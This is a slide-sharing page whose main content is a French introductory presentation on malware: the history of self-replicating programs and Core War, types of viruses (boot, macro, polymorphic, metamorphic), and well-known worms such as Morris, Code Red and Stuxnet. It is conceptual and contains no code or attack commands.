Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...Nawres Farhat
 
RapportPFE_IngenieurInformatique_ESPRIT
RapportPFE_IngenieurInformatique_ESPRITRapportPFE_IngenieurInformatique_ESPRIT
RapportPFE_IngenieurInformatique_ESPRITLina Meddeb
 
tutoriel sur la mise en place d'une politique de sécurité informatique
tutoriel sur la mise en place d'une politique de sécurité informatiquetutoriel sur la mise en place d'une politique de sécurité informatique
tutoriel sur la mise en place d'une politique de sécurité informatiqueManuel Cédric EBODE MBALLA
 
formation istqb.pdf
formation istqb.pdfformation istqb.pdf
formation istqb.pdfmido04
 
Presentation du socle technique Java open source Scub Foundation
Presentation du socle technique Java open source Scub FoundationPresentation du socle technique Java open source Scub Foundation
Presentation du socle technique Java open source Scub FoundationStéphane Traumat
 
Rapport de projet de fin d"études
Rapport de projet de fin d"étudesRapport de projet de fin d"études
Rapport de projet de fin d"étudesMohamed Boubaya
 
Introduction cyber securite 2016
Introduction cyber securite 2016Introduction cyber securite 2016
Introduction cyber securite 2016PRONETIS
 
IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018
IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018
IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018. WATCOM
 
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...Yasmine Lachheb
 
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )Saadaoui Marwen
 
أساسيات أمن المعلومات
أساسيات أمن المعلوماتأساسيات أمن المعلومات
أساسيات أمن المعلوماتMohammed Almeshekah
 
La traçabilité logistique
La traçabilité logistiqueLa traçabilité logistique
La traçabilité logistiqueIlham Yachaoui
 

Tendances (20)

Le Développement d’une Application Web
Le Développement d’une Application WebLe Développement d’une Application Web
Le Développement d’une Application Web
 
Responsabilite du transporteur transport multimodal
Responsabilite du transporteur transport multimodal Responsabilite du transporteur transport multimodal
Responsabilite du transporteur transport multimodal
 
Uml & cas d'utilisation
Uml & cas d'utilisationUml & cas d'utilisation
Uml & cas d'utilisation
 
Rapport PFE: Gestion de Parc Informatique
Rapport PFE: Gestion de Parc InformatiqueRapport PFE: Gestion de Parc Informatique
Rapport PFE: Gestion de Parc Informatique
 
Zoom sur le Métier de Développeur
Zoom sur le Métier de DéveloppeurZoom sur le Métier de Développeur
Zoom sur le Métier de Développeur
 
Serveur ftp
Serveur ftpServeur ftp
Serveur ftp
 
Rapport de stage de fin d'etude l3 angelito & hasina
Rapport de stage de fin d'etude l3 angelito & hasinaRapport de stage de fin d'etude l3 angelito & hasina
Rapport de stage de fin d'etude l3 angelito & hasina
 
Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...
Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...
Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...
 
RapportPFE_IngenieurInformatique_ESPRIT
RapportPFE_IngenieurInformatique_ESPRITRapportPFE_IngenieurInformatique_ESPRIT
RapportPFE_IngenieurInformatique_ESPRIT
 
tutoriel sur la mise en place d'une politique de sécurité informatique
tutoriel sur la mise en place d'une politique de sécurité informatiquetutoriel sur la mise en place d'une politique de sécurité informatique
tutoriel sur la mise en place d'une politique de sécurité informatique
 
formation istqb.pdf
formation istqb.pdfformation istqb.pdf
formation istqb.pdf
 
Presentation du socle technique Java open source Scub Foundation
Presentation du socle technique Java open source Scub FoundationPresentation du socle technique Java open source Scub Foundation
Presentation du socle technique Java open source Scub Foundation
 
Rapport de projet de fin d"études
Rapport de projet de fin d"étudesRapport de projet de fin d"études
Rapport de projet de fin d"études
 
Introduction cyber securite 2016
Introduction cyber securite 2016Introduction cyber securite 2016
Introduction cyber securite 2016
 
Diagramme d'activité en UML
Diagramme d'activité en UMLDiagramme d'activité en UML
Diagramme d'activité en UML
 
IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018
IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018
IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018
 
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...
 
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
 
أساسيات أمن المعلومات
أساسيات أمن المعلوماتأساسيات أمن المعلومات
أساسيات أمن المعلومات
 
La traçabilité logistique
La traçabilité logistiqueLa traçabilité logistique
La traçabilité logistique
 

En vedette

Programmation Android - 00 - Présentation
Programmation Android - 00 - PrésentationProgrammation Android - 00 - Présentation
Programmation Android - 00 - PrésentationYann Caron
 
Devoxx 2015, ionic chat
Devoxx 2015, ionic chatDevoxx 2015, ionic chat
Devoxx 2015, ionic chatLoïc Knuchel
 
Traitement numérique des images - Projet Android "Virtual Pong" - Présentation
Traitement numérique des images - Projet Android "Virtual Pong" - PrésentationTraitement numérique des images - Projet Android "Virtual Pong" - Présentation
Traitement numérique des images - Projet Android "Virtual Pong" - PrésentationValentin Thirion
 
Développement Android
Développement AndroidDéveloppement Android
Développement AndroidFranck SIMON
 
Support de la formation Android 5 , Avancé
Support de la formation Android 5 , Avancé Support de la formation Android 5 , Avancé
Support de la formation Android 5 , Avancé Alphorm
 
Meet up paris 13 of jun 2017
Meet up paris 13 of jun 2017Meet up paris 13 of jun 2017
Meet up paris 13 of jun 2017Jasmine Conseil
 
Android Studio, premier contact
Android Studio, premier contactAndroid Studio, premier contact
Android Studio, premier contactJasmine Conseil
 
Le développement mobile hybride sort du bois, Ch'ti JUG le 15-04-2015
Le développement mobile hybride sort du bois, Ch'ti JUG le 15-04-2015Le développement mobile hybride sort du bois, Ch'ti JUG le 15-04-2015
Le développement mobile hybride sort du bois, Ch'ti JUG le 15-04-2015Loïc Knuchel
 
Radio cognitive et intelligence artificielle
Radio cognitive et intelligence artificielleRadio cognitive et intelligence artificielle
Radio cognitive et intelligence artificiellebenouini rachid
 
Andcx formation-android-avance-creation-d-applications-complexes
Andcx formation-android-avance-creation-d-applications-complexesAndcx formation-android-avance-creation-d-applications-complexes
Andcx formation-android-avance-creation-d-applications-complexesCERTyou Formation
 
Angular 4 - creer composants -- français
Angular 4 - creer composants -- françaisAngular 4 - creer composants -- français
Angular 4 - creer composants -- françaisVERTIKA
 
01 programmation mobile - android - (introduction)
01 programmation mobile - android - (introduction)01 programmation mobile - android - (introduction)
01 programmation mobile - android - (introduction)TECOS
 
03 programmation mobile - android - (stockage, multithreads, web services)
03 programmation mobile - android - (stockage, multithreads, web services)03 programmation mobile - android - (stockage, multithreads, web services)
03 programmation mobile - android - (stockage, multithreads, web services)TECOS
 

En vedette (20)

Programmation Android - 00 - Présentation
Programmation Android - 00 - PrésentationProgrammation Android - 00 - Présentation
Programmation Android - 00 - Présentation
 
Devoxx 2015, ionic chat
Devoxx 2015, ionic chatDevoxx 2015, ionic chat
Devoxx 2015, ionic chat
 
Initiation aux echecs
Initiation aux echecsInitiation aux echecs
Initiation aux echecs
 
Android 6 marshmallow
Android 6 marshmallowAndroid 6 marshmallow
Android 6 marshmallow
 
Traitement numérique des images - Projet Android "Virtual Pong" - Présentation
Traitement numérique des images - Projet Android "Virtual Pong" - PrésentationTraitement numérique des images - Projet Android "Virtual Pong" - Présentation
Traitement numérique des images - Projet Android "Virtual Pong" - Présentation
 
Développement Android
Développement AndroidDéveloppement Android
Développement Android
 
Support de la formation Android 5 , Avancé
Support de la formation Android 5 , Avancé Support de la formation Android 5 , Avancé
Support de la formation Android 5 , Avancé
 
Meet up paris 13 of jun 2017
Meet up paris 13 of jun 2017Meet up paris 13 of jun 2017
Meet up paris 13 of jun 2017
 
Android à domicile
Android à domicileAndroid à domicile
Android à domicile
 
Android Studio, premier contact
Android Studio, premier contactAndroid Studio, premier contact
Android Studio, premier contact
 
Introduction gestion de projet
Introduction gestion de projetIntroduction gestion de projet
Introduction gestion de projet
 
Le développement mobile hybride sort du bois, Ch'ti JUG le 15-04-2015
Le développement mobile hybride sort du bois, Ch'ti JUG le 15-04-2015Le développement mobile hybride sort du bois, Ch'ti JUG le 15-04-2015
Le développement mobile hybride sort du bois, Ch'ti JUG le 15-04-2015
 
Radio cognitive et intelligence artificielle
Radio cognitive et intelligence artificielleRadio cognitive et intelligence artificielle
Radio cognitive et intelligence artificielle
 
Andcx formation-android-avance-creation-d-applications-complexes
Andcx formation-android-avance-creation-d-applications-complexesAndcx formation-android-avance-creation-d-applications-complexes
Andcx formation-android-avance-creation-d-applications-complexes
 
Angular 4 - creer composants -- français
Angular 4 - creer composants -- françaisAngular 4 - creer composants -- français
Angular 4 - creer composants -- français
 
01 programmation mobile - android - (introduction)
01 programmation mobile - android - (introduction)01 programmation mobile - android - (introduction)
01 programmation mobile - android - (introduction)
 
03 programmation mobile - android - (stockage, multithreads, web services)
03 programmation mobile - android - (stockage, multithreads, web services)03 programmation mobile - android - (stockage, multithreads, web services)
03 programmation mobile - android - (stockage, multithreads, web services)
 
Les virus
Les virusLes virus
Les virus
 
Mta
MtaMta
Mta
 
Montage video
Montage videoMontage video
Montage video
 

Similaire à Codes malveillants

Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatiquealexartiste
 
Keynote thierry berthier cybersecurite NOVAQ 2018
Keynote thierry berthier cybersecurite NOVAQ 2018Keynote thierry berthier cybersecurite NOVAQ 2018
Keynote thierry berthier cybersecurite NOVAQ 2018OPcyberland
 
les logiciels malveillant
les logiciels malveillantles logiciels malveillant
les logiciels malveillantfehmi arbi
 
Projet de Securité Informatique.ppt
Projet de Securité Informatique.pptProjet de Securité Informatique.ppt
Projet de Securité Informatique.pptNatijTDI
 
CHAPITRE 2 SECURITE INFORMATIQUE.pptx
CHAPITRE 2 SECURITE INFORMATIQUE.pptxCHAPITRE 2 SECURITE INFORMATIQUE.pptx
CHAPITRE 2 SECURITE INFORMATIQUE.pptxSchadracMoualou
 
unité 2.pptx
unité 2.pptxunité 2.pptx
unité 2.pptxBahaty1
 
Virus informatiques et antivirus
Virus informatiques et antivirusVirus informatiques et antivirus
Virus informatiques et antivirusBrahimDjiddiHabre
 
Internet et sécurité version 2014 01
Internet et sécurité version 2014 01Internet et sécurité version 2014 01
Internet et sécurité version 2014 01Profasser
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatiqueoussama Hafid
 
Virus Et Nuisances Informatiques
Virus Et Nuisances InformatiquesVirus Et Nuisances Informatiques
Virus Et Nuisances Informatiquesm4rylin
 
Article mc secus_10_10
Article mc secus_10_10Article mc secus_10_10
Article mc secus_10_10michelcusin
 
Sécurité2011
Sécurité2011Sécurité2011
Sécurité2011mesminlieg
 
Les attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui AmineLes attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui AmineZellagui Amine
 
Antivirus : une technologie obsolète?
Antivirus : une technologie obsolète?Antivirus : une technologie obsolète?
Antivirus : une technologie obsolète?Sylvain Maret
 

Similaire à Codes malveillants (20)

Veille sans video
Veille sans videoVeille sans video
Veille sans video
 
Virusdoc
VirusdocVirusdoc
Virusdoc
 
Les malwares
Les malwaresLes malwares
Les malwares
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatique
 
Keynote thierry berthier cybersecurite NOVAQ 2018
Keynote thierry berthier cybersecurite NOVAQ 2018Keynote thierry berthier cybersecurite NOVAQ 2018
Keynote thierry berthier cybersecurite NOVAQ 2018
 
les logiciels malveillant
les logiciels malveillantles logiciels malveillant
les logiciels malveillant
 
Projet de Securité Informatique.ppt
Projet de Securité Informatique.pptProjet de Securité Informatique.ppt
Projet de Securité Informatique.ppt
 
Sécuriter informatiques
Sécuriter informatiquesSécuriter informatiques
Sécuriter informatiques
 
CHAPITRE 2 SECURITE INFORMATIQUE.pptx
CHAPITRE 2 SECURITE INFORMATIQUE.pptxCHAPITRE 2 SECURITE INFORMATIQUE.pptx
CHAPITRE 2 SECURITE INFORMATIQUE.pptx
 
unité 2.pptx
unité 2.pptxunité 2.pptx
unité 2.pptx
 
Piratage informatique
Piratage informatiquePiratage informatique
Piratage informatique
 
Virus informatiques et antivirus
Virus informatiques et antivirusVirus informatiques et antivirus
Virus informatiques et antivirus
 
Internet et sécurité version 2014 01
Internet et sécurité version 2014 01Internet et sécurité version 2014 01
Internet et sécurité version 2014 01
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatique
 
Virus Et Nuisances Informatiques
Virus Et Nuisances InformatiquesVirus Et Nuisances Informatiques
Virus Et Nuisances Informatiques
 
Antivirus works
Antivirus worksAntivirus works
Antivirus works
 
Article mc secus_10_10
Article mc secus_10_10Article mc secus_10_10
Article mc secus_10_10
 
Sécurité2011
Sécurité2011Sécurité2011
Sécurité2011
 
Les attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui AmineLes attaques reseaux par zellagui Amine
Les attaques reseaux par zellagui Amine
 
Antivirus : une technologie obsolète?
Antivirus : une technologie obsolète?Antivirus : une technologie obsolète?
Antivirus : une technologie obsolète?
 

Codes malveillants

  • 1. Codes malveillants Worms (vers), virus et bombes logiques Christophe Casalegno Groupe Digital Network
  • 2. Codes malveillants On désigne sous le terme générique de codes malveillants ou malwares l'ensemble des codes développés dans le but de nuire à un système informatique. Il existe de très nombreuses formes différentes de malware. Parler de code « malicieux » est une er- reur : le terme « malware » se traduirait dans son contexte sous le terme « malveillant » (malicious est un faux ami) Il existe de nombreux malwares tel que : virus , vers (worms), bombes logiques (soft bomb), wabbits, chevaux de troie (trojan horses), portes dérobées (backdoors), spyware, scarewares (rogue), rootkits, dialers, adwares, ou parfois encore la combi- naison de plusieurs de ces formes à la fois.
  • 4. Codes malveillants LES VIRUS INFORMATIQUES Un peu d'histoire : les origines
  • 5. Codes malveillants En 1939, John Louis Von Neumann, mathématicien considéré aujourd'hui comme l'un des « pères » des ordinateurs et de l'informatique moderne, publie un article intitulé « Théorie et organisation des automates complexes ». L'homme à qui on doit l'idée de programmes stockés en mémoire et modifiables plutôt que des programmes plus rapides mais « figés » dans les composants matériels évoque alors dans cet article : « la possibilité pour un programme de prendre le contrôle d'un autre programme » Les concepts de programmes autoreproducteurs qu'il y développe alors, en font le père fondateur des théories de virologie informatique.
  • 6. Codes malveillants En 1959, le magazine « Scientific American » publie un article sur les mécanismes auto-réplicateurs, écrit par L.S. Penrose intitulé : « Self-Reproducing Machines » présenté dans le sommaire du magazine comme traitant de : « Simples unités qui sont construites et qui s'assemblent entre elles pour former des unités plus importantes, qui vont à leur tour faire des copies d'elles-même à partir d'autres unités simples. » Le processus mets en lumière les mêmes mécanismes d'auto- reproduction que ceux des molécules biologiques.  
  • 7. Codes malveillants En Août 1961, trois jeunes programmeurs des célèbres Bell Laboratories (ATT), Robert Thomas Morris, Douglas McIlory et Victor Vysottsky, développent un jeu appelé Darwin qui se joue sur mainframe IBM 7090 à l'ère des cartes perforées. Le jeu est composé d'un programme « umpire » ainsi que d'une section de la mémoire de l'ordinateur, appelée l'arène dans laquelle 2 programmes ou plus, écrits par les joueurs sont chargés. Les programmes sont écrits en langage machine pour 7090 sur cartes perforées, et peuvent appeler un certain nombre de fonctions fournies par « umpire » dans le but d'occuper d'autres emplacements dans l'arène, de tuer les programmes ennemis et de remplir toute la mémoire libre par des copies d'eux même.
  • 9. Codes malveillants Le jeu peut se terminer après une durée prédéfinie ou quand il ne reste plus qu'un seul programme en vie : le joueur qui a écrit le programme qui reste le dernier survivant est déclaré vainqueur. Ces programmes (les combattants) qui s'affrontent dans une arène ont notamment inspirés le film Tron dans lequel un programmeur est projeté à l'aide d'un système de dématérialisation au cœur d'un système informatique. Cependant, le jeu ne perdure pas car Robert Thomas Morris réussi alors à développer un combattant composé de 44 instructions, capable d'adapter sa stratégie et de se protéger, que personne n'arrive à vaincre : de ce fait, plus personne ne développe alors d'adversaire et le jeu est abandonné.
  • 10. Codes malveillants LES VIRUS INFORMATIQUES Un peu d'histoire : le Core War
  • 11. Codes malveillants Suite à l'abandon de Darwin, entre 1961 et 1970 va naître le véritable ancêtre des virus : le Core War, appelé également le jeu des programmeurs. A l'instar de Darwin dont il s'inspire, le Corewar consiste à faire s'affronter au minimum 2 programmes, où chacun a pour objectif de détruire le(s) programme(s) adverse(s) et d'occuper toute la mémoire disponible en assurant sa prolifération. L'arène se trouve maintenant au sein de l'espace mémoire d'une machine virtuelle appelée Mars, au sein duquel l'attaquant, qui ignore où sont situés les différents segments de son adversaire, doit le localiser et le détruire.
  • 12. Codes malveillants Le langage utilisé pour créer ses combattants dans le Corewar, le RedCode est proche de l'assembleur avec toutefois un jeu d'instruction simplifié. Il s'exécute dans une machine virtuelle appelée MARS pour Memory Array Redcode Simulator. Il existe plusieurs versions du langage RedCode dans lesquelles le nombre d'instructions peut varier, mais reste (très) proche d'un assembleur.
  • 13. Codes malveillants Malgré l'utilisation de ce langage au jeu d'instruction réduit, le Core War intègre dès sa création, la plupart des mécanismes viraux et anti- viraux connus aujourd'hui : réplication, protection, polymorphisme, destruction, réparation, furtivité, injection de code, arrêt d'un processus et même la reconnaissance des signatures si chère à nos antivirus aujourd'hui encore. Le vainqueur est celui qui possède à la fin de la partie, le plus grand nombre de copies actives du programme. Dans le cas ou la partie n'est pas limitée dans le temps, celui qui a réussi à détruire le programme adverse est déclaré vainqueur. Aujourd'hui encore, on continue à jouer au Core War, et des compétitions sont régulièrement organisées dans le monde entier.
  • 14. Codes malveillants LES VIRUS INFORMATIQUES Définition
  • 15. Codes malveillants Un virus informatique est un malware spécifique, self-réplicateur, conçu, à l'instar des virus biologiques, pour se propager par le biais de programmes qu'il contamine en ajoutant ou en écrasant un code viral. La machine ou le programme ainsi infecté devient un « hôte » du virus. Le virus peut se propager par l'intermédiaire de tout média de communication, tels que disquettes, cd-rom, clefs usb, emails, etc. Les virus ne sont pas autonomes : ils nécessitent un programme hôte pour se dupliquer et se propager. On dénombre plusieurs dizaines de milliers de virus différents s'attaquant principalement au système Windows de Microsoft mais pas seulement.
  • 16. Codes malveillants LES VIRUS INFORMATIQUES Un peu d'histoire : le premier virus
  • 17. Codes malveillants De nombreuses sources sur Internet ou ailleurs citent « Brain » comme étant le premier virus de l'histoire. Celui ci, développé en 1986 par deux frères Pakistanais, les frères Alvi contaminait les disquettes (5" ¼ uniquement) et ne s'attaquait pas aux disques durs. Durant l'infection, Brain se plaçait sur le secteur de démarrage de la disquette puis renommait le nom de volume de la disquette par l'intitulé « (C) Brain ». Brain n'est pas le premier virus recensé : la paternité du premier virus revient à Rich Skrenta, un étudiant américain alors âgé de 15 ans, qui en 1982 crée Elk Cloner... sur Apple II. Elk Cloner envoyait un poème expliquant sa manière de s'auto-répliquer. Rich aurait ainsi réussi à infecter les ordinateurs de ses amis en leur proposant des jeux piratés infectés.
  • 18. Codes malveillants LES VIRUS INFORMATIQUES Généralités
  • 19. Codes malveillants Il existe de très nombreuses formes de virus et ces derniers peuvent être écrits dans n'importe quel langage ; cependant, les premiers virus étaient souvent écrits en assembleur. Les virus contaminent généralement un programme en y injectant du code viral. Ce code viral est alors rajouté en début, milieu, ou fin de programme. Il peut également écraser du code existant. Le programme est alors infecté. Dès que le programme est exécuté, il active le code viral, qui va alors infecter d'autres programmes exécutables. L'action du virus ne se limite pas à l'infection : en fonction de certains paramètres, il active généralement un sous programme exécutant une action pré- déterminée, allant de l'affichage d'un message à la destruction de données : On parle alors de l'activation d'une « bombe logique ».
  • 20. Codes malveillants Les virus informatiques, à l'instar des virus biologiques, ont un cycle de vie. Il est découpé en 7 Phases : 1 - Création : le programmeur écrit le virus 2 - Gestation : l'implantation du virus afin de permettre sa diffusion 3 - Infection, reproduction et prolifération 4 - Activation (réveil et action selon date, signaux et/ou conditions) 5 - Découverte (peut plus rarement être dans les phases précédentes) 6 - Identification et assimilation (mise au points des parades) 7 - Éradication : étape théorique dans laquelle toutes les copies du code viral sont détruites
  • 21. Codes malveillants Les virus peuvent utiliser ou combiner 4 procédés d'infection à vitesse variable : 1 – Infection lente : infection des fichiers que s'ils sont modifiés ou crées afin de tromper les vérificateurs d'intégrité 2 – Infection normale : infection des programmes au fur et à mesure de leur exécution 3 – Infection rapide : infection non seulement du programme exécuté mais également tout programme ouvert ou présent sur le système 4 – Infection occasionnelle et/ou conditionnelle : l'infection sporadique a plus de chance de passer inaperçue
  • 22. Codes malveillants LES VIRUS INFORMATIQUES Les virus de boot
  • 23. Codes malveillants Le virus de boot est un virus spécifique dont le code exécutable est enregistré dans le premier secteur du disque (le secteur de démarrage) également appelé MBR pour Master boot record. On trouve ce secteur sur la plupart des médias tels que les disquettes, les clefs usb, les disques durs ou les CD/DVD-ROM. Ce secteur n'est pas un fichier à proprement parler, mais permet aux systèmes d'exploitation de booter (démarrer). Dans les années 2000, environ 25% des virus étaient de cette nature. La particularité de ce virus, est de n'avoir aucun fichier visible : l'utilisateur a donc tendance à considérer alors le média apparaissant vide comme inoffensif. Certains BIOS de carte mère ont la particularité de pouvoir protéger le MBR du disque dur contre les écritures.
  • 24. Codes malveillants LES VIRUS INFORMATIQUES Les macrovirus
  • 25. Codes malveillants Les macrovirus font partie des virus les plus éloignés du virus originel. En effet, ils n'utilisent pas du tout un langage proche du système tel que l'assembleur mais le langage de macro d'un logiciel pour en altérer le fonctionnement (souvent Visual Basic avec Word ou Excel). Ils s'attaquent donc principalement aux fichiers des utilisateurs et n'infectent pas des programmes : très faciles à programmer, ils se répandent par échange de fichiers lorsque le fichier est ouvert. Cependant, aujourd'hui (en général), un logiciel n'exécute les macros contenues dans un document qu'après la confirmation de l'utilisateur, empêchant alors l'exécution du virus. Si le fichier « sain » intègre des macros, l'utilisateur est alors trompé, et le code hostile est lancé. Il pourra alors infecter d'autres fichiers de l'utilisateur qui les répandra à son tour.
  • 26. Codes malveillants LES VIRUS INFORMATIQUES Les rétrovirus ou virus flibustiers
  • 27. Codes malveillants On appelle « rétrovirus » ou « virus flibustier » (bounty hunter) un virus informatique ayant la capacité de s'attaquer à un antivirus afin de le rendre inopérant. Plusieurs méthodes peuvent être utilisées par les rétrovirus, tel que la modification les signatures antivirus afin de ne pas être détectés ou encore la simulation d'un comportement humain (le rétrovirus va alors reproduire la manipulation normale de désactivation de l'antivirus : ce dernier croyant avoir à faire à un utilisateur autorisé sera donc désactivé laissant le champs libre au rétrovirus.) Les rétrovirus font parti des virus les plus rares mais également les plus dangereux car ils sont capables de passer plusieurs barrières de protections sans être détectés.
  • 28. Codes malveillants LES VIRUS INFORMATIQUES Les virus polymorphes
  • 29. Codes malveillants Comme leur nom l'indique, les virus polymorphes ont la capacité de changer de forme, et donc par la même de tromper les antivirus fonctionnant sur la base de signatures. Afin de réussir cette prouesse, les virus polymorphes cryptent et/ou modifient le code qui les compose à chaque fois qu'ils se reproduisent : de fait, chaque copie du virus est alors différente de la précédente. Pour réussir cette prouesse, le virus polymorphe utilise généralement une routine de chiffrement qui lui permet de modifier certaines de ses instructions au fil des réplications.
  • 30. Codes malveillants Cependant cette méthode utilisée pour rendre le virus polymorphe, requiert l'utilisation de procédures de chiffrement et de déchiffrement, pour que le code viral puisse s'exécuter. C'est ici que se situe la faille du mécanisme : les procédures de chiffrement/déchiffrement, elles, ne changent pas et constituent alors des éléments invariables. Les anti-virus à base de signature peuvent donc en lieu et place de signatures « classiques », utiliser les procédures spécifiques de cryptage / décryptage dont se sert le virus pour se camoufler, comme signature.
  • 31. Codes malveillants LES VIRUS INFORMATIQUES Les virus métamorphes
  • 32. Codes malveillants Les virus métamorphes ressemblent beaucoup aux virus poly- morphes, car ils ont également la capacité de changer de forme, et donc de tromper les antivirus fonctionnant sur la base de signatures. Cependant, contrairement aux méthodes simples de chiffrement et de déchiffrement utilisées par les virus polymorphes, les virus méta- morphes sont capables de modifier leur structure ainsi que les instructions qui les composent. Alors que les différentes formes mutées d'un virus polymorphe partagent le même noyau, et notamment la même fonction de mutation, celles d'un virus métamorphe ont chacune un noyau différent, ce qui le rend beaucoup plus difficile à détecter.
  • 33. Codes malveillants LES WORMS (VERS) On les confond à tort avec les virus
  • 34. Codes malveillants Un ver (ou Worm en anglais), est un programme autonome qui assure sa reproduction en contaminant d'autres ordinateurs, généralement via l'exploitation d'une ou plusieurs vulnérabilité(s). Contrairement aux différents virus présentés, le ver n'a pas besoin d'un programme hôte pour se propager : une connexion réseau lui suffit. Les vers ont une vitesse de propagation très élevée car ils n'ont pas besoin d'une action humaine (lancement de programme par exemple) pour être activés. Ils peuvent donc se répandre sur des milliers de machines vulnérables en à peine quelques minutes. A ce titre, les vers peuvent se révéler beaucoup plus dangereux que les virus.
  • 35. Codes malveillants Les vers peuvent embarquer d'autres programmes ou sous- programmes qui seront alors installés sur la cible, comme des bombes logiques, des virus ou d'autres malwares (backdoors, rootkit, keylogger, sniffers, etc...) Les vers peuvent également utiliser des techniques présentes dans les rétrovirus (virus flibustiers), les virus polymorphes ou les virus métamorphes pour se camoufler ou désactiver certains mécanismes de protection. Enfin ils peuvent également analyser la cible et s'y adapter en téléchargeant des instructions ou des programmes complémentaires au travers d'internet (exploits, virus, etc...).
  • 36. Codes malveillants Le premier ver informatique connu, parfois appelé Rogue ou Great worm, est le ver de Morris. Il a été écrit par Robert Tappan Morris, fils de Robert Morris Sr., cryptographe et spécialiste en sécurité informatique qui travaillait notamment au NCSC (National Computer Security Center), une branche de la NSA (National Security Agency). Le 2 novembre 1988, Robert Tappan Morris lance son ver à partir du MIT. Conçu pour être inoffensif, des erreurs dans son code l'ont rendu plus dangereux, le rendant capable d'infecter plusieurs fois un système, jusqu'à rendre ce dernier inutilisable. Le ver Morris qui infectait les machines VAX, exploitait deux vulnérabilités (sendmail et fingerd) combinées à une tentative de bruteforce des mots de passe.
  • 37. Codes malveillants Morris fut ainsi la première personne à être condamnée en vertu du Computer Fraud and Abuse Act de 1986. Ainsi après être allé en appel il fût condamné à 3 ans de probation, 400 heures de travaux communautaires et à une amende de plus de 10.000$. C'est suite à ce ver que fut créé le premier CERT (Computer Emergency Response Team), centre d'alerte et de réaction aux attaques informatiques dont le rôle est à la fois centralisateur, mais qui s'occupe également du traitement des alertes, de la réaction à apporter, de l'échange d'information avec les autres CERTs, de l'établissement et de la maintenance d'une base de données de vulnérabilités ainsi que de la prévention via la diffusion d'informations sur les précautions à prendre pour limiter les risques d'incident.
  • 38. Codes malveillants Code Red est un exemple intéressant de worm (ver) s'attaquant aux systèmes serveurs Microsoft Windows. Il a été crée en 2001. Code Red (à ne pas confondre avec le langage Red Code du CoreWar) exploite une vulnérabilité des serveurs Web IIS 4.0 et 5.0 de Microsoft. Il a été conçu dans un objectif précis, à savoir attaquer le serveur web de la maison blanche. Lorsque la machine est infectée elle lance une attaque de type Déni de Service (DoS) contre ce dernier.
  • 39. Codes malveillants Vers évolués récents ; Stuxnet, Flame... Points communs : sur-médiatisés Stuxnet a été écrit spécifiquement pour s'attaquer aux systèmes SCADA en les reprogrammant et en camouflant les modifications qu'il a effectué. Il s'attaque notamment aux API produites par Siemens et utilisées au sein des centrales nucléaires et hydro-électriques. On trouve également ces systèmes dans les usines de distribution d'eau potable ou encore dans la gestion des oléoducs.
  • 40. Codes malveillants Vers évolués récents ; Stuxnet, Flame... Points communs : sur-médiatisés Flame s'attaque aux systèmes d'exploitation Windows de Microsoft. Bien que l'on présente la plupart de ses caractéristiques comme révolutionnaires, il n'en est rien : la plupart de ses capacités d'espionnage existent depuis plus d'une décennie avant sa sortie (interception des emails, des conversations en ligne, etc.)
  • 41. Codes malveillants Vers évolués récents ; Stuxnet, Flame... Points communs : sur-médiatisés Le mythe : une légende urbaine crée par la presse et certaines personnes en mal de reconnaissance médiatiques prétendent que seul des services tel que la CIA ou le Mossad seraient capables de telles productions. Réaliser de tels outils est parfaitement à la portée de petites équipées privées motivées : nul besoin des moyens d'un état pour développer de tels systèmes.
  • 42. Codes malveillants De manière générale, il est fort probable que les vers vont intégrer de plus en plus de technologies qui étaient propres aux virus (métamorphisme, rétroviralité) en y ajoutant la capacité d'analyser une cible, embarquant un compilateur évolutif ainsi que la possibilité de se connecter à des ressources situées sur internet pour télécharger le code hostile nécessaire à l'exploitation des vulnérabilités détectées. L'ensemble des connaissances permettant ce type de réalisation est accessible à n'importe quel développeur. Il est également possible de créer des vers « primaires » en shell (unix ou windows) intégrant les mécanismes d'analyse / téléchargement / exploitation en fonction de la cible.
  • 43. Codes malveillants LES CHEVAUX DE TROIE Le maillon faible, c'est vous
